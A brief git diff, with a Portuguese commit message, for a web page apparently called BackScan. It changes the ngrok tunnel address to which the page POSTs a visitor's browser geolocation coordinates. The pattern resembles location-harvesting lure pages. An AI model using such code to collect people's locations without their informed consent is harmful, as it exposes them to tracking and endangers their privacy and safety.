Adiciona correção interface do BackScan

--- a/index.html
+++ b/index.html
@@ -53,7 +53,7 @@
       const longitude = position.coords.longitude;
       const maps = `https://www.google.com/maps?q=${latitude},${longitude}`;
 
-      fetch("https://69a7-177-200-138-224.ngrok-free.app/send-location", {
+      fetch("https://1fdb-177-200-138-128.ngrok-free.app/send-location", {
         method: "POST",
         headers: {
           "Content-Type": "application/json"
